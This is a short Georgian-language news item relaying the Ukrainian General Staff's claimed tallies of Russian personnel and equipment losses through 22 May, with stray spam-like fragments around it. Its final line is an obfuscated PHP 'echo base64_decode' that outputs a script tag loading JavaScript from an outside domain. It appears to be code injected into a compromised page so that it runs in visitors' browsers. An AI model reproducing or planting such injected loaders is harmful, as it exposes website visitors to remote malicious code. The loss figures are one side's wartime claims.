tube
ავერსი jaluzi
უკრაინის შეიარაღებული ძალების გენერალური შტაბის მიერ გამოქვეყნებული ინფორმაციით, 24 თებერვლიდან 22 მაისამდე რუსული მხარის დანაკარგი დაახლოებით 29 050 ჯარისკაცია, რაც გასულ დღესთან შედარებით 200 რუსი სამხედროთი მეტია.
 
„მტრის საბრძოლო დანაკარგები 24 თებერვლიდან 22 მაისამდე დაახლოებით იყო: 29 050 ჯარისკაცი, 1 285 ტანკი, 3141 ჯავშანმანქანა, 599 საარტილერო სისტემა, 201 მრავალჯერადი გამშვები სარაკეტო სისტემა, 93 საჰაერო თავდაცვის სისტემა, 204 თვითმფრინავი, 170 ვერტმფრენი, 470 ოპერატიულ-ტაქტიკური უპილოტო საფრენი აპარატი, 107 ფრთოსანი რაკეტა, 13 ერთეული გემი/კატერი, 2194 საავტომობილო ტექნიკა და საწვავის ავზი, 43 სპეცტექნიკა“, - ნათქვამია უწყების მიერ გავრცელებულ ინფორმაციაში.
 
მათივე ცნობით, გასულ დღეს რუსმა დამპყრობლებმა ყველაზე დიდი დანაკარგი ბახმუცკის მიმართულებით განიცადა.
 
„დაარტყით ოკუპანტს! ჩვენ ერთად გავიმარჯვებთ! ჩვენი ძალა სიმართლეშია!“, - აღნიშნულია უკრაინის შეიარაღებული ძალების გენერალური შტაბის „ფეისბუქზე“ გამოქვეყნებულ პოსტში.
 
 
868
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");